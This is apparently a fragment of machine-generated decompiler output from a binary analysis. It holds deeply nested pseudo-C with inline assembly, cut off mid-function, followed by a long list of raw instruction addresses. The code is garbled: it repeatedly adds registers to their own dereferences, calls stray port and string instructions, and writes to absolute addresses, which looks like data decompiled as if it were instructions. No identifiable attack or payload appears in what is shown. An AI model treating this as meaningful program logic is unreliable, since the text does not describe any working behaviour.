                                    						_t713 = _t712 +  *_t389;
                                    						if (_t713 < 0) goto L95;
                                    						 *_t656 =  *_t656 + _t574;
                                    						 *_t656 =  *_t656 + _t574;
                                    						 *_t389 =  *_t389 + _t389;
                                    						asm("adc esi, [eax]");
                                    						_t391 =  *_t574;
                                    						 *_t574 = _t389;
                                    						 *_t391 =  *_t391 + _t391;
                                    						_t295 = _t391 -  *_t391;
                                    						 *_t574 =  *_t574 + _t656;
                                    						 *_t656 =  *_t656 + _t295;
                                    						_t706 = _t713 + _t694[0x1b];
                                    						goto L96;
                                    					}
                                    				}
                                    				 *_t308 =  *_t308 + _t308;
                                    				asm("adc esi, [eax]");
                                    				_pop(_t310);
                                    				 *_t310 =  *_t310 + _t310;
                                    				 *_t310 =  *_t310 + _t310;
                                    				 *_t310 =  *_t310 + _t310;
                                    				 *_t310 =  *_t310 + _t310;
                                    				_t547 = _t546 +  *_t310;
                                    				asm("rol byte [eax], cl");
                                    				 *_t658 =  *_t658 + _t547;
                                    				 *_t658 =  *_t658 + _t310;
                                    				_t484 = _t484 + _t658;
                                    				_push(es);
                                    				asm("stosd");
                                    				 *_t310 =  *_t310 + _t310;
                                    				_push(es);
                                    				if( *_t310 >= 0) {
                                    					L118:
                                    					 *_t694 =  *_t694 ^ _t310;
                                    					_t548 = _t547 + _t484;
                                    					 *_t310 =  *_t310 + _t310;
                                    					 *((intOrPtr*)(_t310 + _t310)) =  *((intOrPtr*)(_t310 + _t310)) + _t548;
                                    					 *_t548 =  *_t548 + _t658;
                                    					 *((intOrPtr*)(_t694 + _t707 * 2)) =  *((intOrPtr*)(_t694 + _t707 * 2)) + _t310;
                                    					_pop(_t549);
                                    					 *_t310 =  *_t310 + _t310;
                                    					asm("outsd");
                                    					 *_t310 =  *_t310 + _t310;
                                    					_t312 = (_t310 |  *_t310) + 0x6f;
                                    					_t550 = _t549;
                                    					 *_t312 = _t312 +  *_t312;
                                    					asm("lds eax, [eax]");
                                    					 *_t658 =  *_t658 + (_t550 |  *_t312);
                                    					asm("outsd");
                                    					return _t312;
                                    				} else {
                                    					 *_t310 =  *_t310 + _t310;
                                    					_t546 = _t547 |  *_t310;
                                    					_t313 = _t310 - 1;
                                    					 *_t313 =  *_t313 + _t313;
                                    					_t314 = _t313 |  *_t313;
                                    					_t659 = _t658 +  *((intOrPtr*)(_t658 + 5));
                                    					 *_t314 =  *_t314 + _t314;
                                    					if( *_t314 < 0) {
                                    						L117:
                                    						_t547 = _t546 - 1;
                                    						 *_t314 =  *_t314 + _t314;
                                    						_t310 = _t314 |  *_t314;
                                    						_t484 = _t484 +  *_t484;
                                    						asm("outsd");
                                    						_t658 = _t659 -  *_t484;
                                    						goto L118;
                                    					} else {
                                    						asm("cmpsd");
                                    						 *_t314 =  *_t314 + _t314;
                                    						_push(es);
                                    						 *_t659 =  *_t659 + _t314;
                                    						 *((intOrPtr*)(_t707 + 0x280a0000)) =  *((intOrPtr*)(_t707 + 0x280a0000)) - _t484;
                                    						_t658 = _t659 +  *_t700;
                                    						_push(ss);
                                    						if(_t658 >= 0) {
                                    							goto L110;
                                    						} else {
                                    							 *_t314 =  *_t314 + _t314;
                                    							_t484 = _t484 |  *(_t707 + 0x55);
                                    							 *_t314 =  *_t314 + _t314;
                                    							_t319 = _t314 + 2;
                                    							_push(ss);
                                    							if(_t319 >= 0) {
                                    								asm("sbb [edx], al");
                                    								 *_t658 =  *_t658 - _t484;
                                    								 *_t658 =  *_t658 + _t546;
                                    								asm("sbb bl, dl");
                                    								_pop(_t488);
                                    								 *_t319 =  *_t319 + _t319;
                                    								asm("fidiv dword [ebx+0x5c]");
                                    								 *_t319 =  *_t319 + _t319;
                                    								 *_t319 =  *_t319 + _t319;
                                    								_t321 = (_t319 |  *_t319) + 0x6f;
                                    								_pop(_t554);
                                    								 *_t321 =  *_t321 + _t321;
                                    								_t490 = _t488 |  *_t488 |  *_t694;
                                    								asm("sbb [edi], bl");
                                    								ds = ss;
                                    								asm("sbb [eax], ch");
                                    								_pop(_t708);
                                    								 *_t321 =  *_t321 + _t321;
                                    								_t660 = _t658 |  *(_t490 + 0x5e);
                                    								 *_t321 =  *_t321 + _t321;
                                    								_t491 = _t490 |  *_t321;
                                    								asm("sbb [edx], al");
                                    								 *_t660 =  *_t660 - _t491;
                                    								 *_t660 =  *_t660 + _t554;
                                    								asm("sbb bl, dl");
                                    								_pop(ds);
                                    								 *_t321 =  *_t321 + _t321;
                                    								 *_t321 =  *_t321 + _t321;
                                    								_t323 = (_t321 |  *_t321) + 0x6f;
                                    								_pop(_t556);
                                    								 *_t323 =  *_t323 + _t323;
                                    								_t492 = _t491 |  *_t694;
                                    								 *_t323 =  *_t323 + _t323;
                                    								_t662 = _t660 ^  *(_t491 + 0x5c) |  *(_t492 + 0x5f);
                                    								 *_t323 =  *_t323 + _t323;
                                    								_t493 = _t492 |  *_t323;
                                    								_pop(ds);
                                    								 *_t323 =  *_t323 + _t323;
                                    								_t324 = _t323 |  *_t662;
                                    								 *_t662 =  *_t662 - _t493;
                                    								 *_t662 =  *_t662 + _t556;
                                    								asm("sbb bl, dl");
                                    								_pop(ds);
                                    								_t703 = _t700 ^  *(_t493 - 0x70) ^  *(_t493 - 0x70);
                                    								 *_t324 =  *_t324 + _t324;
                                    								 *_t324 =  *_t324 + _t324;
                                    								_t326 = (_t324 |  *_t324) + 0x6f;
                                    								_pop(_t558);
                                    								 *_t326 =  *_t326 + _t326;
                                    								_t495 = (_t493 |  *_t694) -  *_t694;
                                    								 *_t694 =  *_t694 - _t495;
                                    								 *_t326 =  *_t326 - _t708;
                                    								_pop(_t709);
                                    								 *_t326 =  *_t326 + _t326;
                                    								_t663 = _t662 |  *(_t495 + 0x5f);
                                    								 *_t326 =  *_t326 + _t326;
                                    								_t496 = _t495 |  *_t326;
                                    								_pop(ds);
                                    								_t327 = _t326 ^ 0x00000073;
                                    								 *_t327 =  *_t327 + _t327;
                                    								 *_t663 =  *_t663 - _t496;
                                    								 *_t663 =  *_t663 + _t558;
                                    								asm("sbb bl, dl");
                                    								_pop(ds);
                                    								_t329 = (_t327 |  *_t663) ^ 0x00000073;
                                    								 *_t329 =  *_t329 + _t329;
                                    								 *_t329 =  *_t329 + _t329;
                                    								_t330 = _t329 |  *_t329;
                                    								asm("adc al, [eax]");
                                    								asm("sbb [eax], bl");
                                    								_pop(_t664);
                                    								 *_t330 =  *_t330 + _t330;
                                    								_t497 = _t496 |  *_t664;
                                    								asm("ficomp dword [edi]");
                                    								_pop(ss);
                                    								 *((intOrPtr*)(_t330 + _t330)) =  *((intOrPtr*)(_t330 + _t330)) - _t497;
                                    								_t561 = (_t558 |  *(_t694 - 0x5e)) +  *_t330 |  *_t664;
                                    								 *_t330 =  *_t330 + _t330;
                                    								 *_t497 =  *_t497 + _t664;
                                    								 *0x5700 =  *0x5700 ^ _t330;
                                    								 *0x110000 =  *0x110000 + _t561;
                                    								asm("adc al, [eax]");
                                    								_push(ss);
                                    								_t665 = ss;
                                    								 *_t330 =  *_t330 + _t330;
                                    								_t498 = _t497 |  *_t694;
                                    								 *_t330 =  *_t330 + _t330;
                                    								 *_t498 =  *_t498 + _t330;
                                    								asm("outsd");
                                    								asm("insd");
                                    								 *_t330 =  *_t330 + _t330;
                                    								_t331 = _t330 |  *_t498;
                                    								asm("outsd");
                                    								asm("outsb");
                                    								 *_t331 =  *_t331 + _t331;
                                    								_t667 = _t665 |  *_t665 |  *(_t498 - 0x70);
                                    								 *_t331 =  *_t331 + _t331;
                                    								_t564 = _t561 +  *_t330 ^  *_t330 |  *_t331;
                                    								 *_t667 =  *_t667 + _t564;
                                    								_t334 =  *_t694 - 0x1f;
                                    								_t668 = _t667 +  *_t694;
                                    								if(_t668 >= 0) {
                                    									L125:
                                    									asm("outsb");
                                    									 *_t334 =  *_t334 + _t334;
                                    									_t499 = _t498 |  *(_t709 + 0x58);
                                    									 *_t334 =  *_t334 + _t334;
                                    									_t335 = _t334 + 2;
                                    									if(_t335 == 0) {
                                    										 *_t335 =  *_t335 + _t335;
                                    										_push(es);
                                    										_t366 = _t335 + 0xa - 0x45 +  *_t499;
                                    										asm("outsd");
                                    										 *_t668 =  *_t668 + _t564;
                                    										 *((intOrPtr*)(_t564 + 0xb0a0000)) =  *((intOrPtr*)(_t564 + 0xb0a0000)) - _t564;
                                    										_t564 = _t564 +  *_t366;
                                    										_t367 = _t366;
                                    										 *_t367 =  *_t367 + _t367;
                                    										_t668 = _t668 |  *_t668;
                                    										 *_t367 =  *_t367 + _t709;
                                    										if ( *_t367 >= 0) goto L127;
                                    										goto L127;
                                    									}
                                    								} else {
                                    									 *_t334 =  *_t334 + _t334;
                                    									_t369 = _t334 + 2;
                                    									_t710 = _t709 + _t694[0x1b];
                                    									 *_t369 =  *_t369 + _t369;
                                    									_t370 = _t369 |  *_t498;
                                    									asm("outsd");
                                    									asm("outsb");
                                    									 *_t370 =  *_t370 + _t370;
                                    									_t668 = _t668 |  *(_t498 - 0x70);
                                    									 *_t370 =  *_t370 + _t370;
                                    									_t499 = _t498 |  *(_t710 + 0x55);
                                    									 *_t370 =  *_t370 + _t370;
                                    									_t367 = _t370;
                                    									 *_t668 =  *_t668 + _t367;
                                    									_t709 = _t710 +  *_t367;
                                    									if (_t709 >= 0) goto L121;
                                    									 *_t668 =  *_t668 + _t564;
                                    									 *_t668 =  *_t668 + _t564;
                                    									_t703 = _t703 + 1;
                                    									 *_t668 =  *_t668 + _t367;
                                    									_push(ss);
                                    									if( *_t668 >= 0) {
                                    										L127:
                                    										 *_t668 =  *_t668 + _t564;
                                    										_t501 = _t499 +  *((intOrPtr*)(_t709 + _t668 * 2));
                                    										_t232 = _t367 + _t709;
                                    										 *_t232 =  *((intOrPtr*)(_t367 + _t709)) + _t367;
                                    										if ( *_t232 >= 0) goto L128;
                                    										 *_t668 =  *_t668 + _t564;
                                    										asm("ficom dword [edx]");
                                    										 *_t367 =  *_t367 + _t709;
                                    										if ( *_t367 <= 0) goto L129;
                                    										 *_t668 =  *_t668 + _t564;
                                    										_t499 = _t501 +  *((intOrPtr*)(_t709 + _t668 * 2));
                                    										_t236 = _t367 + _t709;
                                    										 *_t236 =  *((intOrPtr*)(_t367 + _t709)) + _t367;
                                    										if ( *_t236 <= 0) goto L130;
                                    										 *_t668 =  *_t668 + _t564;
                                    										asm("fidiv dword [ebx-0x70]");
                                    										 *_t367 =  *_t367 + _t367;
                                    										_t564 = _t564 |  *(_t694 - 0x56);
                                    										 *_t367 =  *_t367 + _t367;
                                    										_t368 = _t367 |  *_t367;
                                    										 *_t368 =  *_t368 + _t368;
                                    										_t335 = _t368 +  *_t499;
                                    										 *_t499 =  *_t499 - _t668;
                                    										 *_t668 =  *_t668 + _t564;
                                    										 *_t668 =  *_t668 + _t335;
                                    									} else {
                                    										 *_t367 =  *_t367 + _t367;
                                    										_t371 = _t367 + 2;
                                    										_t711 = _t709 +  *_t371;
                                    										if (_t711 < 0) goto L123;
                                    										 *_t668 =  *_t668 + _t564;
                                    										 *_t668 =  *_t668 + _t564;
                                    										 *_t371 =  *_t371 + _t371;
                                    										 *_t499 =  *_t499 + _t668;
                                    										_t221 = _t371 + _t371;
                                    										 *_t221 =  *(_t371 + _t371) ^ _t371;
                                    										if ( *_t221 >= 0) goto L124;
                                    										 *_t371 =  *_t371 + _t371;
                                    										 *[cs:eax] =  *[cs:eax] + _t371;
                                    										asm("adc [eax], eax");
                                    										_t372 = _t371 +  *_t499;
                                    										asm("outsd");
                                    										asm("insd");
                                    										 *_t372 =  *_t372 + _t372;
                                    										_t498 = _t499 |  *(_t711 + 0x57);
                                    										 *_t372 =  *_t372 + _t372;
                                    										_t334 = _t372 + 2;
                                    										_t709 = _t711 + _t694[0x1b];
                                    										goto L125;
                                    									}
                                    								}
                                    								 *((intOrPtr*)(_t335 + _t335)) =  *((intOrPtr*)(_t335 + _t335)) - _t668;
                                    								_t337 = (_t335 |  *_t335) -  *(_t335 |  *_t335);
                                    								 *_t337 =  *_t337 + _t337;
                                    								asm("adc esi, [eax]");
                                    								 *((intOrPtr*)(_t337 + 0x2f000000)) =  *((intOrPtr*)(_t337 + 0x2f000000)) + _t337;
                                    								 *_t337 =  *_t337 + _t337;
                                    								asm("adc [eax], eax");
                                    								 *(_t337 + 0x20000000) =  *(_t337 + 0x20000000) & _t337;
                                    								 *_t337 =  *_t337;
                                    								 *((intOrPtr*)(_t499 - 0x2d)) =  *((intOrPtr*)(_t499 - 0x2d)) + _t668;
                                    								 *_t337 =  *_t337 + _t337;
                                    								_t565 = _t564 |  *_t499;
                                    								 *(_t337 + 0x73000000) =  *(_t337 + 0x73000000) & _t337;
                                    								asm("aam 0x0");
                                    								 *_t668 =  *_t668 + _t565;
                                    								asm("outsd");
                                    								asm("aad 0x0");
                                    								 *_t668 =  *_t668 + _t565;
                                    								ss = es;
                                    								asm("ficom dword [ebx]");
                                    								_t339 = (_t337 | 0x00000007) + 0x16;
                                    								asm("adc eax, [0x6f073b2b]");
                                    								asm("salc");
                                    								 *_t339 =  *_t339 + _t339;
                                    								_t669 = _t668 |  *_t694;
                                    								asm("ficom dword [ebx]");
                                    								_push(es);
                                    								asm("adc eax, [edi]");
                                    								es = ss;
                                    								asm("adc [0x8030711], eax");
                                    								_t566 = _t565 +  *((intOrPtr*)(_t703 + 0xd76f69));
                                    								 *_t669 =  *_t669 + _t566;
                                    								do {
                                    									_t339 = _t339 |  *(_t499 + 0x1000045);
                                    									asm("outsd");
                                    									_t839 = _t839 +  *_t339;
                                    									 *_t669 =  *_t669 + _t566;
                                    									 *_t566 =  *_t566 + _t669;
                                    									_pop(es);
                                    									_pop(ss);
                                    									asm("salc");
                                    									asm("adc eax, [edi]");
                                    									asm("adc [edi], eax");
                                    									asm("adc [esi], eax");
                                    									_t669 = _t669 ^ _t499;
                                    									asm("adc [0x513d617], eax");
                                    									asm("adc [0xbf310411], eax");
                                    									_pop(es);
                                    								} while (_t669 >= 0);
                                    								 *_t339 =  *_t339 + _t339;
                                    								_t567 = _t566 |  *0xda6f07;
                                    								 *_t669 =  *_t669 + _t567;
                                    								 *_t567 =  *_t567 + _t567;
                                    								_t568 = _t567 |  *_t499;
                                    								 *_t703 =  *_t703 + _t339;
                                    								_t670 = _t669 -  *_t499;
                                    								 *_t568 =  *_t568 ^ _t339;
                                    								 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t568;
                                    								 *_t339 =  *_t339 + _t339;
                                    								 *_t339 =  *_t339 ^ _t339;
                                    								 *_t568 =  *_t568 + _t670;
                                    								 *_t670 =  *_t670 + _t339;
                                    								if( *_t670 != 0) {
                                    									L137:
                                    									_t340 = _t339 -  *_t339;
                                    									 *_t499 =  *_t499 + _t670;
                                    									 *_t568 =  *_t568 ^ _t340;
                                    									 *((intOrPtr*)(_t340 + _t340)) =  *((intOrPtr*)(_t340 + _t340)) + _t568;
                                    									 *_t340 =  *_t340 + _t340;
                                    									 *_t340 =  *_t340 | _t340;
                                    									 *_t568 =  *_t568 + _t670;
                                    									 *_t670 =  *_t670 + _t340;
                                    									if( *_t670 == 0) {
                                    										 *_t340 =  *_t340 + _t340;
                                    										_push(es);
                                    										_t343 = _t340 + 0xa -  *((intOrPtr*)(_t340 + 0xa)) -  *_t703;
                                    										 *_t670 =  *_t670 + _t343;
                                    										_t695 = _t694 +  *((intOrPtr*)(_t709 + 0x5c));
                                    										 *_t343 =  *_t343 + _t343;
                                    										_t344 = _t343 + 0x2a;
                                    										goto L139;
                                    									}
                                    								} else {
                                    									 *_t339 =  *_t339 + _t339;
                                    									_push(es);
                                    									_t355 = _t339 + 0xa -  *((intOrPtr*)(_t339 + 0xa)) -  *_t703;
                                    									 *_t670 =  *_t670 + _t355;
                                    									_t695 = _t694 +  *((intOrPtr*)(_t709 + 0x59));
                                    									 *_t355 =  *_t355 + _t355;
                                    									_t356 = _t355 + 0x2a;
                                    									 *_t356 =  *_t356 + _t356;
                                    									asm("adc esi, [eax]");
                                    									 *_t356 =  *_t356 + _t356;
                                    									_t344 = _t356;
                                    									 *_t344 =  *_t344 + _t344;
                                    									 *_t344 =  *_t344 ^ _t344;
                                    									 *_t568 =  *_t568 + _t670;
                                    									 *_t670 =  *_t670 + _t344;
                                    									if( *_t670 != 0) {
                                    										L139:
                                    										 *_t344 =  *_t344 + _t344;
                                    										asm("adc esi, [eax]");
                                    										 *_t344 =  *_t344 + _t344;
                                    										_t345 = _t344;
                                    										 *_t345 =  *_t345 + _t345;
                                    										asm("sbb eax, 0x110000");
                                    										_t499 = _t499 +  *((intOrPtr*)(_t499 + 0x5d));
                                    										 *_t345 =  *_t345 + _t345;
                                    										_push(es);
                                    										_t348 = _t345 + 0xa -  *((intOrPtr*)(_t345 + 0xa)) -  *_t703;
                                    										 *_t670 =  *_t670 + _t348;
                                    										_t696 = _t695 +  *((intOrPtr*)(_t709 + 0x5d));
                                    										 *_t348 =  *_t348 + _t348;
                                    										_t349 = _t348 + 0x2a;
                                    										 *_t349 =  *_t349 + _t349;
                                    										goto L140;
                                    									} else {
                                    										 *_t344 =  *_t344 + _t344;
                                    										_push(es);
                                    										_t359 = _t344 + 0xa -  *((intOrPtr*)(_t344 + 0xa)) -  *_t703;
                                    										 *_t670 =  *_t670 + _t359;
                                    										_t696 = _t695 +  *((intOrPtr*)(_t709 + 0x5a));
                                    										 *_t359 =  *_t359 + _t359;
                                    										_t360 = _t359 + 0x2a;
                                    										 *_t360 =  *_t360 + _t360;
                                    										asm("adc esi, [eax]");
                                    										 *_t360 =  *_t360 + _t360;
                                    										_t349 = _t360;
                                    										 *_t349 =  *_t349 + _t349;
                                    										 *_t349 =  *_t349 ^ _t349;
                                    										 *_t568 =  *_t568 + _t670;
                                    										 *_t670 =  *_t670 + _t349;
                                    										if( *_t670 != 0) {
                                    											L140:
                                    											 *_t499 =  *_t499 + _t670;
                                    											 *_t568 =  *_t568 ^ _t349;
                                    											 *((intOrPtr*)(_t349 + _t349)) =  *((intOrPtr*)(_t349 + _t349)) + _t568;
                                    											 *_t349 =  *_t349 + _t349;
                                    											asm("sbb eax, 0x110000");
                                    											 *_t349 =  *_t349 + _t349;
                                    											_push(es);
                                    											_t352 = _t349 + 0xa -  *((intOrPtr*)(_t349 + 0xa)) -  *_t703;
                                    											 *_t670 =  *_t670 + _t352;
                                    											 *_t352 =  *_t352 + _t352;
                                    											_t340 = _t352 + 0x2a;
                                    											 *_t340 =  *_t340 + _t340;
                                    										} else {
                                    											 *_t349 =  *_t349 + _t349;
                                    											_push(es);
                                    											_t363 = _t349 + 0xa -  *((intOrPtr*)(_t349 + 0xa)) -  *_t703;
                                    											 *_t670 =  *_t670 + _t363;
                                    											_t694 = _t696 +  *((intOrPtr*)(_t709 + 0x5b));
                                    											 *_t363 =  *_t363 + _t363;
                                    											_t339 = _t363 + 0x2a;
                                    											goto L137;
                                    										}
                                    									}
                                    								}
                                    								asm("adc esi, [eax]");
                                    								 *_t340 =  *_t340 | _t340;
                                    								return _t340;
                                    							} else {
                                    								 *_t319 =  *_t319 + _t319;
                                    								_t314 = _t319 + 2;
                                    								_pop(ss);
                                    								asm("outsd");
                                    								goto L117;
                                    							}
                                    						}
                                    					}
                                    				}
                                    			}
                                    0x006a68c8
                                    0x006a68ca
                                    0x006a68cc
                                    0x006a68cf
                                    0x006a68d2
                                    0x006a68d6
                                    0x006a68d9
                                    0x006a68db
                                    0x006a68dc
                                    0x006a68de
                                    0x006a68df
                                    0x006a68e1
                                    0x006a68e3
                                    0x006a68e4
                                    0x006a68e4
                                    0x006a6942
                                    0x006a6943
                                    0x006a6948
                                    0x006a694c
                                    0x006a694e
                                    0x006a694f
                                    0x006a6951
                                    0x006a6954
                                    0x006a6956
                                    0x006a69ca
                                    0x006a69cc
                                    0x006a69cf
                                    0x006a69d3
                                    0x006a69d3
                                    0x006a69d4
                                    0x006a69d6
                                    0x006a69d8
                                    0x006a69d9
                                    0x006a69da
                                    0x006a69dc
                                    0x006a69de
                                    0x006a69e0
                                    0x006a69e1
                                    0x006a69e3
                                    0x006a69e5
                                    0x006a69e8
                                    0x00000000
                                    0x006a6958
                                    0x006a6958
                                    0x006a6959
                                    0x006a695b
                                    0x006a697f
                                    0x006a6981
                                    0x006a6983
                                    0x006a6985
                                    0x006a69eb
                                    0x006a69eb
                                    0x006a69ec
                                    0x006a69ed
                                    0x006a69f1
                                    0x006a69f3
                                    0x006a69f4
                                    0x006a69f6
                                    0x006a69f9
                                    0x006a69fb
                                    0x006a6a6f
                                    0x006a6a6f
                                    0x006a6a72
                                    0x006a6a74
                                    0x006a6a76
                                    0x006a6a78
                                    0x006a6a7e
                                    0x006a6a80
                                    0x006a6a86
                                    0x006a6a88
                                    0x006a6a8b
                                    0x006a6a8c
                                    0x006a6a8e
                                    0x00000000
                                    0x006a69fd
                                    0x006a69fd
                                    0x006a69fe
                                    0x006a6a00
                                    0x006a6a24
                                    0x006a6a26
                                    0x006a6a28
                                    0x006a6a28
                                    0x006a6a2a
                                    0x006a6a90
                                    0x006a6a90
                                    0x006a6a92
                                    0x006a6a94
                                    0x006a6a96
                                    0x006a6a97
                                    0x006a6a99
                                    0x006a6a9d
                                    0x006a6a9e
                                    0x006a6aa3
                                    0x00000000
                                    0x006a6aa5
                                    0x006a6aa5
                                    0x006a6aaa
                                    0x006a6aae
                                    0x006a6ab0
                                    0x006a6ab1
                                    0x006a6ab3
                                    0x006a6ab5
                                    0x006a6ab5
                                    0x006a6ab6
                                    0x006a6aba
                                    0x006a6abd
                                    0x006a6abf
                                    0x006a6ac2
                                    0x006a6ac3
                                    0x006a6ac5
                                    0x006a6ac7
                                    0x00000000
                                    0x006a6ac7
                                    0x006a6a2c
                                    0x006a6a2c
                                    0x006a6a2e
                                    0x006a6a34
                                    0x006a6a36
                                    0x006a6a3c
                                    0x006a6a3e
                                    0x006a6a41
                                    0x006a6a45
                                    0x006a6a47
                                    0x006a6a48
                                    0x006a6a4a
                                    0x006a6a4f
                                    0x006a6a51
                                    0x006a6a53
                                    0x006a6a56
                                    0x006a6a59
                                    0x006a6a5d
                                    0x006a6a60
                                    0x006a6a62
                                    0x006a6a63
                                    0x006a6a65
                                    0x006a6a66
                                    0x006a6a68
                                    0x006a6a6a
                                    0x00000000
                                    0x006a6a6a
                                    0x006a6a02
                                    0x006a6a02
                                    0x006a6a04
                                    0x006a6a04
                                    0x006a6a07
                                    0x006a6a6b
                                    0x006a6a6b
                                    0x006a6ac9
                                    0x006a6aca
                                    0x006a6acf
                                    0x006a6ad3
                                    0x006a6ad5
                                    0x006a6ad6
                                    0x006a6ad8
                                    0x006a6adb
                                    0x006a6add
                                    0x006a6b51
                                    0x006a6b53
                                    0x006a6b56
                                    0x006a6b5a
                                    0x006a6b5a
                                    0x006a6b5b
                                    0x006a6b5d
                                    0x006a6b5f
                                    0x006a6b60
                                    0x006a6b61
                                    0x006a6b63
                                    0x006a6b67
                                    0x006a6b68
                                    0x006a6b6a
                                    0x006a6b6c
                                    0x006a6b6f
                                    0x00000000
                                    0x006a6adf
                                    0x006a6adf
                                    0x006a6ae0
                                    0x006a6ae2
                                    0x006a6b06
                                    0x006a6b08
                                    0x006a6b0a
                                    0x006a6b0c
                                    0x006a6b72
                                    0x006a6b72
                                    0x006a6b73
                                    0x006a6b74
                                    0x006a6b78
                                    0x006a6b7a
                                    0x006a6b7b
                                    0x006a6b7d
                                    0x006a6b80
                                    0x006a6b82
                                    0x006a6bf6
                                    0x006a6bf6
                                    0x006a6bf9
                                    0x006a6bfb
                                    0x006a6bfd
                                    0x006a6bff
                                    0x006a6c01
                                    0x006a6c05
                                    0x006a6c07
                                    0x006a6c09
                                    0x006a6c0b
                                    0x006a6c0d
                                    0x006a6c0f
                                    0x006a6c11
                                    0x006a6c13
                                    0x006a6c14
                                    0x006a6c16
                                    0x00000000
                                    0x006a6b84
                                    0x006a6b84
                                    0x006a6b85
                                    0x006a6b87
                                    0x006a6bab
                                    0x006a6bad
                                    0x006a6baf
                                    0x006a6bb1
                                    0x006a6c17
                                    0x006a6c17
                                    0x006a6c18
                                    0x006a6c19
                                    0x006a6c1b
                                    0x006a6c22
                                    0x006a6c26
                                    0x006a6c28
                                    0x006a6c29
                                    0x006a6c2a
                                    0x006a6c2c
                                    0x006a6c2e
                                    0x006a6c2f
                                    0x006a6c30
                                    0x006a6c32
                                    0x006a6c35
                                    0x006a6c37
                                    0x006a6c3b
                                    0x006a6c3f
                                    0x006a6c41
                                    0x006a6c43
                                    0x00000000
                                    0x006a6c45
                                    0x006a6c45
                                    0x006a6c47
                                    0x006a6c49
                                    0x006a6c4c
                                    0x006a6c4e
                                    0x00000000
                                    0x006a6c4e
                                    0x006a6bb3
                                    0x006a6bb3
                                    0x006a6bb5
                                    0x006a6bbb
                                    0x006a6bbd
                                    0x006a6bc3
                                    0x006a6bc5
                                    0x006a6bc8
                                    0x006a6bcc
                                    0x006a6bce
                                    0x006a6bcf
                                    0x006a6bd1
                                    0x006a6bd6
                                    0x006a6bd8
                                    0x006a6bda
                                    0x006a6bdd
                                    0x006a6be0
                                    0x006a6be2
                                    0x006a6be4
                                    0x006a6be7
                                    0x006a6be9
                                    0x006a6bea
                                    0x006a6bec
                                    0x006a6bed
                                    0x006a6bef
                                    0x006a6bf1
                                    0x00000000
                                    0x006a6bf1
                                    0x006a6b89
                                    0x006a6b89
                                    0x006a6b8b
                                    0x006a6b8b
                                    0x006a6b8e
                                    0x006a6bf2
                                    0x006a6bf2
                                    0x006a6c50
                                    0x006a6c50
                                    0x006a6c51
                                    0x006a6c52
                                    0x006a6c54
                                    0x006a6c57
                                    0x006a6c59
                                    0x006a6c5c
                                    0x006a6c5e
                                    0x006a6c60
                                    0x006a6c62
                                    0x006a6c63
                                    0x006a6c65
                                    0x006a6c67
                                    0x006a6c69
                                    0x006a6c6b
                                    0x006a6c6d
                                    0x006a6c72
                                    0x006a6c74
                                    0x006a6c76
                                    0x006a6c79
                                    0x006a6c7b
                                    0x006a6c7c
                                    0x006a6c7e
                                    0x006a6c7f
                                    0x006a6c84
                                    0x006a6ce2
                                    0x006a6ce2
                                    0x006a6ce4
                                    0x006a6ce6
                                    0x006a6ce8
                                    0x006a6cea
                                    0x006a6cec
                                    0x006a6cee
                                    0x006a6cf0
                                    0x006a6cf1
                                    0x006a6cf3
                                    0x006a6cf5
                                    0x006a6cf6
                                    0x006a6cf8
                                    0x006a6cfa
                                    0x006a6cfc
                                    0x006a6cfe
                                    0x006a6d00
                                    0x006a6d06
                                    0x006a6d07
                                    0x006a6d09
                                    0x006a6d0b
                                    0x006a6d0d
                                    0x006a6d0f
                                    0x006a6d11
                                    0x006a6d12
                                    0x006a6d14
                                    0x006a6c86
                                    0x006a6c86
                                    0x006a6c8c
                                    0x006a6c8e
                                    0x006a6c8f
                                    0x006a6c90
                                    0x006a6c92
                                    0x006a6c93
                                    0x006a6c93
                                    0x006a6c96
                                    0x006a6c9a
                                    0x006a6c9b
                                    0x006a6c9d
                                    0x006a6ca5
                                    0x006a6ca7
                                    0x006a6ca9
                                    0x006a6cab
                                    0x006a6cad
                                    0x006a6cae
                                    0x006a6cb0
                                    0x006a6cb2
                                    0x006a6cb4
                                    0x006a6cb5
                                    0x006a6cba
                                    0x006a6cbc
                                    0x006a6cc2
                                    0x006a6cc4
                                    0x006a6cc5
                                    0x006a6cc6
                                    0x006a6cc8
                                    0x006a6cca
                                    0x006a6ccb
                                    0x006a6ccc
                                    0x006a6cd0
                                    0x006a6cd1
                                    0x006a6cd3
                                    0x006a6cd5
                                    0x006a6cdc
                                    0x006a6cdd
                                    0x006a6cdf
                                    0x00000000
                                    0x006a6cdf
                                    0x006a6cba
                                    0x006a6bf4
                                    0x006a6bf4
                                    0x00000000
                                    0x006a6bf4
                                    0x006a6b90
                                    0x006a6b90
                                    0x006a6b92
                                    0x006a6b94
                                    0x006a6b95
                                    0x006a6b99
                                    0x006a6b9c
                                    0x006a6b9e
                                    0x006a6ba1
                                    0x006a6ba2
                                    0x00000000
                                    0x006a6ba2
                                    0x006a6b8e
                                    0x006a6b87
                                    0x006a6b0e
                                    0x006a6b0e
                                    0x006a6b10
                                    0x006a6b16
                                    0x006a6b18
                                    0x006a6b1e
                                    0x006a6b20
                                    0x006a6b23
                                    0x006a6b25
                                    0x006a6b27
                                    0x006a6b29
                                    0x006a6b2b
                                    0x006a6b2d
                                    0x006a6b30
                                    0x006a6b31
                                    0x006a6b33
                                    0x006a6b35
                                    0x006a6b37
                                    0x006a6b39
                                    0x006a6b3b
                                    0x006a6b3c
                                    0x006a6b3e
                                    0x006a6b42
                                    0x006a6b43
                                    0x006a6b48
                                    0x006a6ba6
                                    0x006a6ba6
                                    0x006a6b4a
                                    0x006a6b4a
                                    0x00000000
                                    0x006a6b4c
                                    0x006a6b48
                                    0x006a6ae4
                                    0x006a6ae4
                                    0x006a6ae6
                                    0x006a6ae6
                                    0x006a6ae9
                                    0x006a6b4d
                                    0x006a6b4d
                                    0x006a6b4e
                                    0x006a6b4f
                                    0x00000000
                                    0x006a6aeb
                                    0x006a6aeb
                                    0x006a6aed
                                    0x006a6aef
                                    0x006a6af0
                                    0x006a6af4
                                    0x006a6af7
                                    0x006a6af9
                                    0x006a6afc
                                    0x006a6afd
                                    0x006a6b01
                                    0x006a6b01
                                    0x006a6b01
                                    0x006a6ae9
                                    0x006a6ae2
                                    0x006a6a6d
                                    0x006a6a6d
                                    0x00000000
                                    0x006a6a6d
                                    0x006a6a09
                                    0x006a6a09
                                    0x006a6a0b
                                    0x006a6a0d
                                    0x006a6a0e
                                    0x006a6a10
                                    0x006a6a12
                                    0x006a6a15
                                    0x006a6a17
                                    0x006a6a18
                                    0x006a6a1a
